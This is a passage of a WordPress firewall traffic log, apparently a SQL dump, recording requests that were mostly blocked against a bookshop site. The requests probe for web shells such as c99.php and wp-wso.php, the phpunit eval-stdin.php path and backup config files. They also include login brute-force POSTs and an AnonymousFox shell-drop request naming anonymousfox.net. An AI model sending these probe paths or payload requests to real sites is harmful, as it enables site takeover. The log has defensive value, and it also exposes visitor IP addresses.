Safari\\/537.36\"}','agFWAc4CRHzTLv8i3Vl0PByZ',0,1636910009.8566,1147,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TOsVeoCbqGxkAgLthSYNUIZ1',0,1636910011.1960,725,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9fBaHkwELy2CUTXF3GK8PJnQ',0,1636910012.1101,1097,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Z1rj8L4xg9XT2epCQvhWtPzq',0,1636910013.6683,1178,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5kQXtYMJP9V0RAWaB8bjshGm',0,1636910015.0042,863,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GMEnASPuqjTZXyUNQeBbc04z',0,1636910016.3974,428,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6ndrfMywJO35BciTpjZg1los',0,1636910016.9852,842,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w9DWcGOkpeHUMNLoCYhtbm6d',0,1636910018.2015,758,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y1r8W0qAhDuen7Uim2BsSdxN',0,1636910019.1206,847,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zKnDAPekT8MmGUZsdvj3wVfu',0,1636910020.1122,1014,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','auitv5jRBAGyMU0wEelP4OYq',0,1636910021.2989,1257,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x3bylce9vAmDI0HNK85PrVhY',0,1636910023.0841,639,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5U3Q0LWM7xdniyhVPsr2e4pb',0,1636910023.8779,580,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uBZa5OAEPxzR1WD89SbJGnN0',0,1636910024.6095,1086,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hg3f1tL06vDm2CqkXT5Z7WYp',0,1636910026.0774,1146,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xQMIsRtBa61djkW5OVXHYZrN',0,1636910027.3903,1599,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zv5FXtTILldpOHCzemDVyBU3',0,1636910029.1158,1291,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dvF4lVm2Lx965AYeNn7qajrE',0,1636910030.5668,1072,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fyRdz5slA0k7rJY6jZLoVIKn',0,1636910031.9474,756,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jNtlxyAvCpRP7bHrG3OUKfas',0,1636910032.8579,1009,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','McnGPhKk0FIfqJ2LBQxzXwVi',0,1636910034.1075,1156,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JuAEKjZRdfyBGMwDp8Om01Uq',0,1636910035.4101,1052,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jMdHgx6GNtDRKzk85XFlp1CO',0,1636910036.8279,435,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ICGV52Tn0OxwXZpNg7k3ytce',0,1636910037.3962,895,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LZPQb07q5gF1jrMfN9ke3WpI',0,1636910038.4574,968,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wnESGKR6gHWJt31kZ9OIiaQP',0,1636910039.5963,1807,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xO3coVTRH0eL4srMpB5wakKj',0,1636910041.5654,1486,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DJImBVYiyxAHWS974jTLGdZ8',0,1636910043.2280,1847,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','23s9vWyZJLtP8BefmFoMdDuC',0,1636910045.2276,1823,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mFGPBWAxszu0TDhKN7jSlk9U',0,1636910047.1885,1144,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rtBjI3oMpF6U9qJCnAcDyOvm',0,1636910048.4837,1380,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZFQa4p8bhkRYwzx9MjLI1N7V',0,1636910050.0077,1635,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zcWfl8IdNTPRh4p7wEjMU2yi',0,1636910051.7847,1273,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EJMrOZGRwHI9lNgzfk3yBsVT',0,1636910053.1954,1142,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cvjpXUFlChugRGf2JAy57IkY',0,1636910054.4634,860,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3m0sMRlxBuHTNqC5fZzVvAec',0,1636910055.4563,1651,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k5rzxsEHbym2Ga7qldBUAYR9',0,1636910057.4066,1533,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','q7BiFADnoGhVkgrHxj5XZJIP',0,1636910059.0797,1327,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hjRQTWNGpLmqrtAyZV2kxE0K',0,1636910060.5678,1295,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9NDUsohyfF2d1mzAxTpGLw5i',0,1636910062.0310,1548,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AD4PYfXHOwyCu0l9ZidxNqnV',0,1636910063.7182,809,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Qdl5eNFGBUML0VCfHhYocgnP',0,1636910064.6889,681,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ci2l3guv89LG4BKmyp60jRhO',0,1636910066.2336,1700,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k12xjvtSPJp8eKzZG6DfBEyw',0,1636910068.0700,944,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YGZ6sRvSTidDJmzuN2hgHkra',0,1636910069.1622,1271,'','GET',404,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SZuksaIh93HKDVTnFgiLqXJ7',0,1636910070.8727,851,'','GET',403,0,700,0,1,'',0),('139.59.118.238',2335930094,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','uoLQIk8ea9ElGhOfiytMJz6P',0,1636910070.2941,1680,'','POST',403,0,600,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R625arcZwxh8AgGemikjUKon',0,1636910071.9294,1182,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fjN7HuqDO8viWFpUACgLRxeb',0,1636910073.2564,898,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FukDogbXMN6ZP54teylfOUsH',0,1636910074.2893,1444,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QC6pWDBV2Tr8079Eu3PMwGzA',0,1636910075.9058,1853,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n4PGgmojS2Ai5QlELqw3RTpv',0,1636910077.8944,1185,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i5sG1zMEUck3CdPqxjmvwh9D',0,1636910079.2274,632,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZrWpuDciXEQSjd2w1NvI3faA',0,1636910079.9893,906,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RC9kl7KPYJGS0otLTV5WO6HQ',0,1636910081.0455,968,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ve5h97TjR8PF3iqOSt4wlELU',0,1636910082.4681,1581,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','A7qeXhrG8ymbvZc4OFlTSatk',0,1636910084.9195,1197,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5JXATgpisy9fanUoY7jQmBOz',0,1636910086.4280,759,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CdcH95Sjf7G68UmkLoEYhQ3T',0,1636910087.3669,832,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UVxXH1fgkGZMp49qs53dtRuB',0,1636910088.4118,1179,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zDLPVil7RYOHrp4UZ6a10KhT',0,1636910089.7626,798,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iyonVPcXq1xhAHJdZ0DIaY8m',0,1636910090.7307,392,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','45o37tASLBFuEmY2sd91U6Xy',0,1636910091.3777,1476,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VHr1dxB8Qky79TXuOFKj4ZJM',0,1636910092.9980,1173,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XRweUfLSltrhc2sJZ8BnxVdF',0,1636910094.3013,1178,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eLPyVSoqQjuB06tmW3RxkcOX',0,1636910095.6202,1365,'','GET',403,0,700,0,1,'',0),('104.154.85.100',1754944868,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','jmcPfzsULIthunYqZoWHpi7N',0,1636910790.7513,974,'','POST',403,0,600,0,1,'',0),('35.203.61.118',600522102,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','7bpBhLx6ry1SGquQCDTMle2A',0,1636911513.3163,1327,'','POST',403,0,600,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','ehlNq8yPDTu2d0pCo9ctwvMj',0,1636912294.1406,1019,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','liYZEPrkOwCoSH6t0UyWRech',0,1636912295.8192,740,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"python-requests\\/2.26.0\"}','ulBGbrAg4t0JjpsKWX9ESL8Z',0,1636912297.2987,1032,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','fbjFR0DLsoUTC71ygnJOeZmS',0,1636912299.1434,984,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149\"}','RlpdeqPa3YW1SyEXKmJIcrzT',0,1636912300.8939,1181,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/style.php?sig=beima&domain=anonymousfox.net&shell_file=qcivlupzkrs&file_name=/fox-style.php','','{\"1\":\"python-requests\\/2.26.0\"}','sConm4XJlr6wVUbLv0kaK3hu',0,1636912302.7523,1247,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','DN0L6yT3evpQASzEgkPrth2q',0,1636912304.6745,1157,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.26.0\"}','foPkQ7wsx8DjVglp6IC9Ebnu',0,1636912306.6551,528,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/magic-old-index.php','','{\"1\":\"python-requests\\/2.26.0\"}','ZNmBfTqxPzHLiOdWkvAJ2p9a',0,1636912308.0434,780,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','F40oc57DXkBYTSgHbJKiqxtV',0,1636912309.3853,654,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','M4zBRZn23dXYCps8qgjvoKiP',0,1636912310.9080,711,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','bIuAHMmKWQDvwxELF2BCz5c0',0,1636912312.2184,953,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','CbSy9hp2AKlxiEqzo5BR0Yv6',0,1636912313.8341,1512,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','L4FeC3HXmcWr8kbh9z5yJ6ND',0,1636912315.9569,561,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 